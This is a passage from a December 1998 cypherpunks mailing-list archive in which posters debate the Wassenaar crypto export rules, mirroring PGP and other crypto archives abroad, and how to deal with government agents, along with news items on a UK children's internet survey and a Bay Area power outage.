lawyer's name is X, I have officially informed you that I am represented by
counsel and thus you cannot question me without counsel being present."

When they write a letter, you handle it the way Rumpole of the Baily
handled those letters from the Inland Revenue.  You throw it away.

Some years ago at 5000 Bonny Doone Road Santa Cruz, CA an IRS agent rang
the bell outside the gate in the fence of the reinforced concrete house
owned by Robert Anson Heinlein.  He wanted to talk.  Heinlein said "go
away" "write a letter."  The Agent said "you're not going to make me drive
all the way back to San Jose, are you?"  Heinlein said "Yes."

You don't have to talk to government agents -- even if they arrest you.
Saying "No" and "Go Away" is short and easy to say.  

>And above all else, beyond being
>symbolically defiant, I would first aim for being Real.   It can be the
hardest
>thing to do, stand your ground and be calm and real.

Just Say No.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@stallion.ee>
Date: Tue, 8 Dec 1998 16:56:08 +0800
To: Peter Gutmann <pgut001@cs.auckland.ac.nz>
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <91301833500932@cs26.cs.auckland.ac.nz>
Message-ID: <Pine.GSO.4.00.9812081020170.2355-100000@stal-gw.stallion.ee>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 7 Dec 1998, Peter Gutmann wrote:

> One thing which came to me recently when I was trying to figure out what sort 
> of gun the US held to the rest of the world's head to get them to agree to 
> this: Could the Wassenaar outcome have been a sign of Echelon in action?

Much more I believe it could have been the promise of US to allow the W
countries to use the Echelon system sometimes. Something like in case your
country needs access to the system, it might be possible to order this
service from US Echelon Co. Of course US either would allow it in cases
like international terrorism threats, not for spying on European political
organs, technological and development and research organisations US
probably is using it for today. And it could be just a promise by US. 

Why this thing might have worked would be because the level education and
understanding of US and European representatives at these issues (Echelon,
communications wiretapping) could be very different, so the non-US
politicians might have not understood what they were really voting on. And
of course the government of every country in the world is always happy if
it can spy on anyone. Sad that they do not understand that the crypto
software today is a little bit too advanced and freely available that who
wants can still use it. 

Jyri Kaljundi
jk@stallion.ee
AS Stallion Ltd
http://www.stallion.ee/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Dec 1998 00:33:00 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Export of PGP Illegal in Denmark. Threatened w. jail (fwd)
In-Reply-To: <v04020a2cb291de81a209@[139.167.130.248]>
Message-ID: <199812081533.KAA12990@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>Hi
>This is a true story. Denmark now - along with the whole EU - has
>assimilated US-crypto laws.
>I just had a phone conversation with the danish ministry of commerce,
>the export control division. The kind lady I spoke to threatened me with
>fines or jail for up to two years.
>
>For having PGP for free download on my homepage!
>
>I called the division to hear about the Wassenaar arrangement on
>export-restrictions on strong crypto and its consequences. So I ask this
>lady something like: I have this strong crypto program called PGP on my
>homepage. What should I do. Does this Wassenaar arrangement concern me?
>	'It sure does', she replies, and start to ask a lot of questions about
>my homepage - does it have unlimited global access etc. And then she
>says: 'You better take it down', and starts to reiterate the legal
>aspects, e.g. two laws from EU on export restrictions.
>	Specifically she points out the penal code: Fines. Jail.
>	So...


What you say in this case is "The Wassenaar arrangement was changed in
secret a few days ago.  It is merely advisory.  Has the efficient Denmark
bureaucracy had time to change the laws and regs since then or are you just
blowing hot air?"

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Dec 1998 00:41:08 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Building crypto archives worldwide to foil US-built Ber
In-Reply-To: <199812081527.KAA07438@unix1.worldlynx.net>
Message-ID: <199812081552.KAA12917@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



David Beroff wrote:

>Wait a sec.  Maybe I'm confused.  I thought you were talking about
>mass-mirroring the  *content*  of key sites, not just the URL pointers.
>
>I would imagine that a small committee would have to "edit" by 
>suggesting what should and shouldn't be included; one must realize
>that if the final file is too large, people will be discouraged from
mirroring.

Yes, Gilmore's proposal was to mirror the contents; URLs threaten
no reg-makers.

Yep, mirrors of everything would be very large. We've heard already
that folks would like help in knowing what to mirror if they can't do
large archives, or can't easily decide which are most important. 

My advice so far: mirror whatever you can until better advice comes forth. 
Prime need: many mirrors of the strongest stuff, especially anything above 
40-bits, that is anything that now requires a US export license (which appears
to be where Wassenaar wildebeests and the domestic US is being stampeded).

What would help is a list from experts on what are the most gov-enraging 
programs. We'd like to offer a few of those on jya.com, to test BXA's up-and-
running crypto-enforcement program, maybe get some jail and trial pleasure,
it's been too quiet on Bernstein, Junger, Karn, et al, a deliberate gov-stall,
awaiting Wassenaar.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Dec 1998 00:51:34 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: The problem with 'Gilmore's RSAREF' site...
In-Reply-To: <199812081450.IAA10578@einstein.ssz.com>
Message-ID: <199812081541.KAA14344@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:50 AM 12/8/98 -0600, Jim Choate wrote:
>Here's the bottem line issue with Gilmore's RSAREF site.
>
>It isn't Gilmore's, it's EFF's.
>
>It isn't Gilmore's butt on the line as it would be for person who
>participate in his call to action.
>
>What's EFF going to do to protect those participants? Nothing.
>
>What's Gilmore personaly going to do to protect those participants? Nothing.
>
>He's asking others to put their butt in the line of fire while he sits
>safely in a rear area.
>
>In effect he's asking YOU to be cannon fodder for his rights.

Save that the cowards have never busted anyone for crypto exports.  It's
dead letter law.  They know they'd lose a criminal case against a civilian.

DCF

"Who personally exported RSA/PERL labels to an alien working for a UK
newspaper at the 1995 CFP at the SFO Marriot."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 01:37:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
Message-ID: <199812081647.KAA11529@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 08 Dec 1998 17:28:59 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)

> For longer term it might be desirable to have a site in a crypto-
> politics neutral country (one that is unlikely to have crypto laws
> in foreseeable future) to which software could be uploaded.
> Downloading is then import and not subject to restriction.

Where? Where is there a country that has a social, economic, and legal
infrastructure of sufficient breadth but liberal views of speech to support
such an effort?

There are lots of little countries around but they have unstable
governments, no economy to speak of, limited telecommunications
infrastructure, etc.

It's fine and dandy to talk about this in the theoretic but the rubber has
to hit the road at some point.

There isn't such a country to be had.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: landon dyer <landon@best.com>
Date: Wed, 9 Dec 1998 04:44:40 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: I Got Mine
In-Reply-To: <199812081702.LAA05425@manifold.algebra.com>
Message-ID: <4.1.19981208104711.00a36dd0@shell9.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain




>There's a great deal of legal commentary in Heinlein. 

my favorite, from _The Number of the Beast_

the protagonists land in an alternate universe, a very nice
version of the US, a good safe haven.  there are no lawyers,
and all references to "The Year they Hung the Lawyers" have
been scrubbed from the readily available history books...



-landon (re-lurking)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 02:25:07 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
Message-ID: <199812081658.KAA11596@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
> Date: Tue, 8 Dec 1998 16:43:58 +0100 (MET)
> From: 3umoelle@informatik.uni-hamburg.de (Ulf =?iso-8859-1?Q?M=F6ller?=)

> > Ah, so the call is for folks in Denmark to post the various pieces of
> > currently available software then, not everyone on the planet as it appears.
> 
> It is not just about Denmark. The Wassenaar arrangement has been
> signed by 33 countries, including the US, Canada, the European Union,
> Japan, Australia, New Zealand, Norway and others. Up to now, 30 of
> these states have allowed to export mass market and public domain
> crypto software without a license. Only the US, France and NZ did not
> have the "General Software Note".

Which is EXACTLY my point. People are being asked to put their butts on the
line with no infrastructure or plan for what happens when the LEA's show up.

Such poor planning is doomed to fail.

> The US has exercised extreme pressure at the Wassenaar conference (as
> one German government official writes) and has managed to get the
> General Software Note modified. Now the states that have signed the
> arrangement will have to regulate the export of strong
> cryptography. There are other places such as Brazil, Iceland, South
> Africa, India, and even Singapore which do not have any export
> restrictions. 

And look at their social, economic, and civil liberty records. Other than
Iceland not one area on  your list of places has sufficient resources of the
correct type to support this sort of effort.

Iceland is about the only place that has any hope at all.

Is there any move by any group to start some sort of archive there? Are
there any subscribers from Iceland on the CDR? If so, I'd like their view
on how realistic it would be to host a site in Iceland.

> John Gilmore writes: "I call for volunteers in each country, at each
> university or crypto-aware organization, to download crypto tools
> while they can still be exported from where they are, and then to
> offer them for export from your own site and your own country as long
> as it's legal."                                               ^^^^^^^
> ^^^^^^^^^^^^^
> Which is exactly what is needed in this situation.

Which, again, is my point. What is Gilmore going to do when they decide to
make it illegal and start hassling these folks who were kind enough to back
him? What does he OWE them for their participation in HIS movement?

> RSAREF is what he has determined he can legally export from the US. So,
> yes, he is doing what he also asks others to do.

Hm, funny. Looks like EFF owns that site. Gilmore is doing nothing himself.
He's using EFF as a shield for personal liability. Why isn't he suggesting
that others do this instead of direct and personal action? Why is he not
running the gilmore.org site directly? Why isn't he looking at starting some
sort of international organization similar to EFF, or expanding EFF to do
this sort of stuff and at the same time provide the same sort of legal
shield he currently enjoys?

> > Let me ask you this Ulf, when is YOUR site going up?
> 
> My university is already distributing SSLeay, PGP, ssh, cfs and other
> cypto tools. As long as they continue to do so, I won't make my mirror
> available on the web, but my own crypto site is going up later this
> week with another piece of strong crypto software.

Kudos.

> > What are you going to do for YOUR liberty today? Has Gilmore agreed to
> > help fund YOUR fight of the change in your courts?
> 
> Today I am going to create the distribution of the software I have
> been working on in the past months, have the server set up and, if all
> goes well, upload the file.
> 
> I have made a few thousand dollars on developing crypto software and I
> am ready to use much of that money to defend my right to distribute
> the results of my work on the web. I haven't asked John or anybody
> else to help me.

But John IS asking you, me, and others to help him.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 9 Dec 1998 02:29:39 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: I Got Mine
In-Reply-To: <199812081533.KAA12935@mail1.panix.com>
Message-ID: <199812081702.LAA05425@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



What are those books?

igor

Duncan Frissell wrote:
> 
> 
> At 08:39 PM 12/3/98 -0800, Blanc wrote:
> >(Yes, but how do you actually respond to a real
> >live representative standing at your door (they showed me their Batches),
> to a
> >real-live situtation when you are taken to a little room and asked to strip
> >("asked"?) at the airport?)   
> 
> I was discussing this very question with the inamorata of a member of this
> list recently in San Jose.  We were trying to figure out why I knew
> instinctively what to say when confronted with government agents and she
> didn't (though she is an attorney).  I figured out that it was because I
> read Heinlein.  He taught a lot about how to respond to these things.
> Those who haven't read Heinlein (or don't learn from books) won't know what
> to say.  And in these high stress situations, answers which you have
> thought about in advance or conducted mental simulations with will come out
> more easily.  
> 
> You say - "Go away."  "Write me a letter."  "I only deal with government
> agents via my lawyer."  "Where's Your Warrant."  Or how about -- "My
> lawyer's name is X, I have officially informed you that I am represented by
> counsel and thus you cannot question me without counsel being present."
> 
> When they write a letter, you handle it the way Rumpole of the Baily
> handled those letters from the Inland Revenue.  You throw it away.
> 
> Some years ago at 5000 Bonny Doone Road Santa Cruz, CA an IRS agent rang
> the bell outside the gate in the fence of the reinforced concrete house
> owned by Robert Anson Heinlein.  He wanted to talk.  Heinlein said "go
> away" "write a letter."  The Agent said "you're not going to make me drive
> all the way back to San Jose, are you?"  Heinlein said "Yes."
> 
> You don't have to talk to government agents -- even if they arrest you.
> Saying "No" and "Go Away" is short and easy to say.  
> 
> >And above all else, beyond being
> >symbolically defiant, I would first aim for being Real.   It can be the
> hardest
> >thing to do, stand your ground and be calm and real.
> 
> Just Say No.
> 
> DCF
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 02:02:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Ber (fwd)
Message-ID: <199812081704.LAA11667@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 08 Dec 1998 10:41:33 -0500
> From: John Young <jya@pipeline.com>
> Subject: Re: Building crypto archives worldwide to foil US-built Ber

> Yes, Gilmore's proposal was to mirror the contents; URLs threaten
> no reg-makers.
> 
> Yep, mirrors of everything would be very large. We've heard already
> that folks would like help in knowing what to mirror if they can't do
> large archives, or can't easily decide which are most important. 

[text deleted]

> What would help is a list from experts on what are the most gov-enraging 
> programs. We'd like to offer a few of those on jya.com, to test BXA's up-and-
> running crypto-enforcement program, maybe get some jail and trial pleasure,
> it's been too quiet on Bernstein, Junger, Karn, et al, a deliberate gov-stall,
> awaiting Wassenaar.

Besides enraging, it should also include the necessary documents,
monographs, libraries, etc. to empower others to write the code within their
own legal boundaries.

If somebody makes the effort to compile such a list I'd like to personaly
request they include this in addition to finished product.



    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 9 Dec 1998 05:21:29 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: The problem with 'Gilmore's RSAREF' site...
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B335@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> In effect he's asking YOU to be cannon fodder for his rights.

No, he's asking people who are willing to act in their own self-interest to
protect the flow of strong crypto. Note he didn't even ask people to do so
as civil disobedience (illegally), which I would myself be more than willing
to do could I afford the bandwidth and legal fees.

If you have no self-interest, then shut up and don't participate. You're in
the USS Republic of Texas anyway.

	Matt


"Anyone who fights for the future,
lives in it today."  --Ayn Rand




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 8 Dec 1998 20:24:32 +0800
To: ravage@EINSTEIN.ssz.com
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
In-Reply-To: <199812080331.VAA07823@einstein.ssz.com>
Message-ID: <199812081139.LAA18806@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> > The US Wassenaar initiative is an attempt to deny the public not only
> > all future strong crypto developments, but all existing ones.  As
> > today's message from Denmark makes clear, the freedom-hating
> > bureaucrats are threatening to prosecute a citizen merely for
> > publishing PGP on his web page.
> 
> And this is different from yesterday how?

What's different is that this is Denmark now.  Before it was just the
US.

> > Let's at least ensure that they don't eliminate *today's* strong
> > crypto, by replicating crypto archives behind each Berlin Wall they
> > threaten to erect.
> 
> Are you offering to put up your monies to provide any and all legal and
> other support for any such site that participates? When is your site going
> up?

John said that people should put up per country mirrors first globally
accessible, but if required by local laws / harrassment to stop doing
that make them accessible only in the country.

As a fall back position as I understand it, so that all the useful
crypto apps are still available.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Griffiths <griffith@wis.weizmann.ac.il>
Date: Tue, 8 Dec 1998 18:23:42 +0800
To: x <cypherpunks@cyberpass.net
Subject: Re: Building crypto archives worldwide to foil US-built Berlin  Walls
In-Reply-To: <3.0.32.19691231160000.006fd6e8@shell15.ba.best.com>
Message-ID: <366CF6FD.DBBE7AD2@wis.weizmann.ac.il>
MIME-Version: 1.0
Content-Type: text/plain



x wrote:
> 
> This brings to mind again a method of distribution that I've thought for
> some time and has probably been discussed on this list before...
> For (a trivial) example take the image of PGP zipped up for download.
> Three different sites create a unique portion of that image for
> themselves, for example, each site takes every third byte, and throw
> in some additional obfuscation...It then is trivial to reconstruct
> the desired image from the independent sources, while none of the
> sources themselves can be subject to controls without having to go
> down the rat hole of having to define what really constitutes the
> restricted material...

1. What is the point of the obfuscation? If it's not legal to do it
openly, then it's certainly not legal to hide the fact your doing it.
"The accused did it in such a way as to demonstrate that he was aware
of it's illegality".

2. By your example, you could also take a cruise missile apart, and
ship each part separately. After all, none of it is actually a missile.

However I 'export' PGP from the US, I'm exporting it, even if I have a
web site for each bit, 0 or 1 being determined by whether Clinton has
a cigar or not in a posted picture.
Yes, the law is inconsistent (let alone stupid). Not, I wouldn't want
to try this and expect to be immune from prosecution.

Tim G

--
Tim Griffiths                   griffith@wis.weizmann.ac.il
Center for Submicron Research   http://tim01.ex.ac.uk
Weizmann Institute of Science   (972)-8-934-2736
Rehovot 76100 Israel

 'I have sat and listened to the arguments of men,
  and I tell you they are shallow movements in space
  tied to reality only by the ego of their minds.' -DF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 9 Dec 1998 04:26:59 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: I Got Mine
In-Reply-To: <199812081757.MAA06069@mail1.panix.com>
Message-ID: <199812081807.MAA06805@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Duncan Frissell wrote:
> 
> At 11:02 AM 12/8/98 -0600, Igor Chudov @ home wrote:
> >What are those books?
> >
> >igor
> 
> Stranger In a Strange Land
> 
> "UN Secret Police breaking down door while Jubal contacts the Secretary
> General via his astrologer."

Duncan,

I apologize for my ignorance. I am not very well aware of this Heinlein
fellow.

What I am looking for is a practical guide book on how to deal with
cops and other law enforcement/jackbooted thug types, in the manner
that minimizes my long term damage. Something along the lines of "You
and the Police!", by Boston T. Party, a book that I greatly enjoyed.

The ideal book would explain my rights, typical reactions of LE, 
precedents, some practical matters, dealing with hostile LE, etc etc.
Would be especially valuable to me as I am a foreigner.

What I am NOT looking for is something about UN troops hiding in
my backyard, choosing the best gun to shoot tax collectors, etc.

igor

> Rocket Ship Galileo
> 
> "Launching before being served by court order -- see also 'The Man Who Sold
> the Moon' and the movie 'Destination Moon'."
> 
> The Notebooks of Lazaraus Long
> 
> "Beware of strong drink.  It might make you shoot at tax collectors -- and
> miss."
> 
> There's a great deal of legal commentary in Heinlein.  There are more
> references where he comments on the need for warrants for searches.  It is
> a very common theme in other right wing/libertarian SF as well.
> 
> DCF
> 
> "
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damaged justice <frogfarm@yakko.cs.wmich.edu>
Date: Wed, 9 Dec 1998 03:17:37 +0800
To: cypherpunks@Algebra.COM
Subject: Survey Says Kids Feel 'Threatened' By Internet
Message-ID: <19981208124833.A13068@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain




   A survey has suggested that up to half a million British children may
   have been upset by something they have seen on the Internet.
   
   The NOP poll shows that one in five of nearly 4,000 children between
   the ages of six and 16 interviewed for the survey between September
   and October this year were "uncomfortable" with some content viewed
   on-line.
   
   In the UK, 2.4 million children are estimated to use the Internet -
   roughly a third of all children between six and 16.
   
   Of those who have had negative experiences while surfing the Internet,
   the largest proportion - 40% - had seen something "rude".
   
   'Not surprised'
   
   One in seven said they had encountered content that had "freightened
   them", while 25% saw pages that they thought "would get them into
   trouble".
   
   NOP Associate Director Rob Lawson described the numbers as a
   "significant minority".
   
   The children's charity NCH Action for Children suggested the survey
   strengthened calls for Internet regulation to protect younger users.
   
   Charity spokesman John Carr said: "I regret to say I'm not surprised
   by this survey's findings, it's what we have been saying for some
   time.
   
   Net nannies
   
   "Parents need to know their children are surfing the net in safety and
   security. At the moment, they have no way of knowing that at all."
   
   NCH Action for Children, which advises the government on children's
   issues, backs the introduction of "net nannies" - programmes which
   filter out content unsuitable for children.
   
   The survey, called Kids.net, was paid for by Microsoft, the BBC,
   NatWest and Anglia Multimedia in syndicate.
   
   The Department of Trade and Industry's forthcoming review on Internet
   regulation is expected to be published before Christmas.

[from news.bbs.co.uk]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 8 Dec 1998 20:38:01 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Building crypto archives worldwide to foil US-built Berlin  Walls
In-Reply-To: <3.0.32.19691231160000.006fd6e8@shell15.ba.best.com>
Message-ID: <366D134F.54FFCEA4@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Tim Griffiths wrote:

> However I 'export' PGP from the US, I'm exporting it, even if I have a
> web site for each bit, 0 or 1 being determined by whether Clinton has
> a cigar or not in a posted picture.

Hence the best way, once there are strict export regulations, is not 
to export. One moves rather knowledge (thought) across the country 
boundaries and there build locally the desired software. That's why 
I believe it will be increasingly more essential for the future to 
have good crypto algorithms that are very simple to describe and
implement. Whether these are very fast is at most of secondary
importance. For really very critical applications seldom involve
huge volumes and even if they do the computing cost hardly matters
and one can employ multiple hardware to achieve the required
rate of transmission.

M. K. Shen

------------------------------------------------------
M. K. Shen, Postfach 340238, D-80099 Muenchen, Germany
+49 (89) 831939   (6:00 GMT)
mok-kong.shen@stud.uni-muenchen.de
http://www.stud.uni-muenchen.de/~mok-kong.shen/     (Last updated: 
10th October 1998.  Origin site of WEAK1, WEAK2, WEAK3 and WEAK3-E.
Containing 2 mathematical problems with rewards totalling US$500.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Dec 1998 03:47:41 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: The problem with 'Gilmore's RSAREF' site...
In-Reply-To: <199812081450.IAA10578@einstein.ssz.com>
Message-ID: <199812081805.NAA19779@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell  wrote:

>Save that the cowards have never busted anyone for crypto exports.  It's
>dead letter law.  They know they'd lose a criminal case against a civilian.

But isn't the punishment a fine rather than a bust. With the usual grabs
of income and possessions if you don't pau. And then being listed on the
dreaded "Entities Index," BXcommunicated.

Sure, you can take it to trial, and BXA reports on those at its Web site,
actually crows about them, the wins, that is. No losses are ever
posted, lacking a reporting system for those.

In any case, these pockets are bottomless, so mega-fines are just fine, the 
FUSG gonna be in really deep deficit denial if it forfeitures this blackhole.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Dec 1998 03:58:51 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: I Got Mine
In-Reply-To: <199812081533.KAA12935@mail1.panix.com>
Message-ID: <199812081757.MAA06069@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:02 AM 12/8/98 -0600, Igor Chudov @ home wrote:
>What are those books?
>
>igor

Stranger In a Strange Land

"UN Secret Police breaking down door while Jubal contacts the Secretary
General via his astrologer."

Rocket Ship Galileo

"Launching before being served by court order -- see also 'The Man Who Sold
the Moon' and the movie 'Destination Moon'."

The Notebooks of Lazaraus Long

"Beware of strong drink.  It might make you shoot at tax collectors -- and
miss."

There's a great deal of legal commentary in Heinlein.  There are more
references where he comments on the need for warrants for searches.  It is
a very common theme in other right wing/libertarian SF as well.

DCF

"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 9 Dec 1998 03:53:47 +0800
To: damaged justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Survey Says Kids Feel 'Threatened' By Internet
In-Reply-To: <19981208124833.A13068@yakko.cs.wmich.edu>
Message-ID: <366D6B76.13E6F105@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



damaged justice wrote:
> 
>    A survey has suggested that up to half a million British children may
>    have been upset by something they have seen on the Internet.

IMHO, we should take a poll that shows that we've all been upset by what
Congress and the TLA's have been doing. :^)  If anything, it would be a whole
more truthful.


-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\ 
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*-->                       US information warfare assets against   \/|\/
  /|\   In Minitru, Miniluv,  individuals,businesses and governments   \|/ 
 + v +  and Minipax We Trust  in Europe and elsewhere"  -- Ross Anderson
----------------------------  http://www.sunder.net   ---------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Wed, 9 Dec 1998 06:09:59 +0800
To: cypherpunks@Algebra.COM
Subject: Power Outage in San Fransisco/bay area
Message-ID: <Pine.LNX.4.02.9812081311290.1412-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



Well, we are going on hour 4 now, most of the power is back.  One group of
2-4 employees caused it they say.  This was admitted 3 hours later, and
then they knew 15 minutes after it happens.. typical.  They expect to be
back on by this afternoon

On the Shell Building at 8:30AM

"Building closed, no power.  Power will not be restored for 6-8 hours."

I wonder how they knew.  The estimate is probably about right too, wierd.

The mission village sub-station has been re-oppened, and most peoples
power is now being revived.  Funny how 2-4 people not following procedure
were able to shut down 4 substations.  Looks like PG&E have lots of work
ahead to find out the cause/effect of this type action.

Max
--   Max Inux <maxinux@openpgp.net>  New DH and RSA keys Generated.
               Kinky Sex makes the world go round
       If crypto is outlawed only outlaws will have crypto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Dec 1998 04:44:12 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Baker on Gilmore's Foil of Wassenaar
Message-ID: <199812081838.NAA28722@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Response to a forward of John Gilmore's message to UK Crypto:

Date: Tue, 8 Dec 1998 09:50:19 -0500
From: <sbaker@steptoe.com>
To: <ukcrypto@maillist.ox.ac.uk>
Subject: Re:Foil to Wassenaar 
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="simple boundary"


I would only add this caution.  I think John is wrong in giving legal 
advice that Wassenaar is not binding without implementing legislation.  
That is an American approach to these matters. I believe that many, 
perhaps most, Wassenaar members derive their authority to regulate 
exports directly from the arrangement itself.  For that reason, I would 
not assume that everyone everywhere is free to ignore the new 
restrictions until some further law or regulation is promulgated.

Stewart Baker
Steptoe & Johnson LLP
202.429.6413
sbaker@steptoe.com

Baker & Hurst, "The Limits of Trust -- Governments, Cryptography, and
Electronic
Commerce" is now available from

http://www.amazon.com/exec/obidos/ASIN/9041106359






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 05:35:20 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: The problem with 'Gilmore's RSAREF' site... (fwd)
Message-ID: <199812081949.NAA13070@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: The problem with 'Gilmore's RSAREF' site...
> Date: Tue, 8 Dec 1998 11:20:00 -0800 

> Jim Choate wrote:
> > In effect he's asking YOU to be cannon fodder for his rights.
 
> No, he's asking people who are willing to act in their own self-interest to
> protect the flow of strong crypto. Note he didn't even ask people to do so
> as civil disobedience (illegally), which I would myself be more than willing
> to do could I afford the bandwidth and legal fees.

No, what he's asking people to do is provide a mechanism for politicaly
controversial material to be made available in areas that are legal for
those who are in areas where it isn't legal. If you seriously wish to
propose that won't make you a target then you have no clue how LEA's work.

While he does this behind the legal protection of EFF he's asking others to
do it first person, something he apparently can't find the fortitude to do
himself. Further, he's not willing to extend his legal protection to help 
others.

> If you have no self-interest, then shut up and don't participate. You're in
> the USS Republic of Texas anyway.

What an ignorant statement. When is YOUR CDR node going up (email accounts
are about $25/mo)? I've put up and continue to do so, when do you commit and 
then obtain the morale right to criticize others who are acting in their and
